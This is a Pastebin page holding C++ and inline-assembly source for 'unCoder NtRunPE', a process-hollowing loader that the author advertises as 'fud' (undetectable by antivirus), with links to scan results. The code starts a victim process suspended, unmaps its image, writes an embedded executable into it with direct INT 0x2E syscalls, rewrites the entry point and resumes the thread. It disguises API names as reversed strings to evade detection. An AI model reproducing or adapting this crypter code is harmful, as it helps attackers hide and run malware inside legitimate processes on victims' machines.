Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- =========================== unCoder NtRunPE =============================
- Fully C0ded By : unCoder
- unCoderSc@gmail.com | unk0@hotmail.com
- skype : unk0:live
- [+] Coding Languages : C++ , Assembly
- [+] Gr3at'z Th4nks t0 : NativeCall - Simon-Benyo - ColdZer0 - V4zer
- [+] Great WebSites : undocumented.ntinternals.net - hackhound.org - dev-point.com
- # Scan Result :
- https://www.metascan-online.com/en/scanresult/file/38c4abdd6e204eb48f9742875c39c7b1
- http://vscan.novirusthanks.org/analysis/dc31c03fa7643bd31cf7a5e6c2de4a8e/bnRydW5wZS1leGU=/
- http://chk4me.com/check/public/68C28g_17WebNKXQn6iAV9RuJ13IZU_D
- What's New ?
- > working by native apis , With the last door in the usermode [ SYSENTER ( INT 2E ) ]
- > so it's fud & fast & super RUNPE :P
- [-] first share , so errors may occur any errors you have fix it if you can or contact me .
- =========================== unCoder NtRunPE =============================
- */
- #include <Windows.h>
- #include <stdio.h>
- #include <iostream>
- #include "bytes.h"
- ///// Apis [ ntdll ] /////
- char* apis[] = {
- "daerhTtxetnoCteGtN" /*NtGetContextThread */,
- "noitceSfOweiVpamnUtN" /*NtUnmapViewOfSection */,
- "yromeMlautriVetacollAtN" /*NtAllocateVirtualMemory */,
- "yromeMlautriVetirWtN" /*NtWriteVirtualMemory */,
- "daerhTtxetnoCteStN" /*NtSetContextThread */,
- "daerhTemuseRtN" /*NtResumeThread */};
- ////////////////
- int GetProcNtNumber(const char* proc)
- {
- int number = NULL;
- if(ReadProcessMemory(GetCurrentProcess(),(LPVOID)((DWORD)(GetProcAddress(LoadLibraryA("ntdll"),proc))+1),&number,1,NULL))
- return number;
- return 0;
- }
- std::string rev(std::string string)
- {
- string = std::string(string.rbegin(),string.rend());
- return string;
- }
- void NtRunPE(LPBYTE buffer,LPCTSTR victimPath)
- {
- int API_NUMBER = NULL;
- PIMAGE_DOS_HEADER PDH;
- PIMAGE_NT_HEADERS PNH;
- PIMAGE_SECTION_HEADER PSH;
- PDH = (PIMAGE_DOS_HEADER)&buffer[0];
- PNH = (PIMAGE_NT_HEADERS)&buffer[PDH->e_lfanew];
- if(PDH->e_magic != IMAGE_DOS_SIGNATURE)
- return;
- if(PNH->Signature != IMAGE_NT_SIGNATURE)
- return;
- PROCESS_INFORMATION PI;
- STARTUPINFO SI;
- ZeroMemory(&SI,sizeof(STARTUPINFO));
- SI.cb = sizeof(STARTUPINFO);
- if(!CreateProcessW(victimPath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&SI,&PI))
- return;
- // NtGetContextThread <>
- API_NUMBER = GetProcNtNumber("NtGetContextThread"); // It's detected if it's reverse encryption :\
- CONTEXT *context;
- HANDLE hThread = PI.hThread;
- context->ContextFlags = CONTEXT_FULL;
- __asm
- {
- PUSH context
- PUSH hThread
- MOV EAX,API_NUMBER
- MOV EDX,ESP
- INT 0x2E
- }
- if(context->Eax == NULL)
- return;
- // NtGetContextThread <>
- // NtUnmapViewOfSection <>
- API_NUMBER = GetProcNtNumber(rev(apis[1]).c_str());
- HANDLE hProcess = PI.hProcess;
- DWORD imageBase = PNH->OptionalHeader.ImageBase;
- __asm
- {
- PUSH imageBase
- PUSH hProcess
- MOV EAX,API_NUMBER
- MOV EDX,ESP
- INT 0x2E
- }
- // NtUnmapViewOfSection <>
- // NtAllocateVirtualMemory <>
- API_NUMBER = GetProcNtNumber(rev(apis[2]).c_str());
- DWORD SizeOfImage = PNH->OptionalHeader.SizeOfImage;
- __asm
- {
- PUSH PAGE_EXECUTE_READWRITE
- PUSH MEM_COMMIT | MEM_RESERVE
- PUSH SizeOfImage
- PUSH NULL
- PUSH imageBase
- PUSH hProcess
- MOV EAX,API_NUMBER
- MOV EDX,ESP
- INT 0x2E
- }
- // NtAllocateVirtualMemory <>
- // NtWriteVirtualMemory <>
- API_NUMBER = GetProcNtNumber(rev(apis[3]).c_str());
- // 1 - Writing Headers
- DWORD HeadersSize = PNH->OptionalHeader.SizeOfHeaders;
- __asm
- {
- PUSH NULL
- PUSH HeadersSize
- PUSH buffer[0]
- PUSH imageBase
- PUSH hProcess
- MOV EAX,API_NUMBER
- MOV EDX,ESP
- INT 0x2E
- }
- // 2- Writing Sections
- DWORD PointerToRawData ;
- DWORD SizeOfRawData;
- LPVOID nextsection_adrr;
- for (int i = 0 ; i < PNH->FileHeader.NumberOfSections ; i++)
- {
- PSH = (PIMAGE_SECTION_HEADER)&buffer[PDH->e_lfanew + sizeof(PIMAGE_NT_HEADERS) + sizeof(PIMAGE_SECTION_HEADER) * i];
- PointerToRawData = PSH->PointerToRawData;
- SizeOfRawData = PSH->SizeOfRawData;
- nextsection_adrr = (LPVOID)(PNH->OptionalHeader.ImageBase + PSH->VirtualAddress);
- __asm
- {
- PUSH NULL
- PUSH SizeOfRawData
- PUSH buffer[PointerToRawData]
- PUSH nextsection_adrr
- PUSH hProcess
- MOV EAX,API_NUMBER
- MOV EDX,ESP
- INT 0x2E
- }
- }
- // NtWriteVirtualMemory <>
- // NtSetContextThread <>
- API_NUMBER = GetProcNtNumber(rev(apis[4]).c_str());
- // calc the new entry [ imagebase + entrypoint address ]
- DWORD NewEax = PNH->OptionalHeader.ImageBase + PNH->OptionalHeader.AddressOfEntryPoint;
- context->Eax = NewEax;
- __asm
- {
- PUSH context
- PUSH hThread
- MOV EAX,API_NUMBER
- MOV EDX,ESP
- INT 0x2E
- }
- // NtSetContextThread <>
- // NtResumeThread <>
- API_NUMBER = GetProcNtNumber(rev(apis[5]).c_str());
- __asm
- {
- PUSH NULL
- PUSH hThread
- MOV EAX,API_NUMBER
- MOV EDX,ESP
- INT 0x2E
- }
- // NtResumeThread <>
- }
- int main()
- {
- NtRunPE(buffer,L"C:\\Test.exe");
- return 0;
- }
- //bytes.h
- // Your File bytes
- BYTE buffer[] = { 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00
- };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement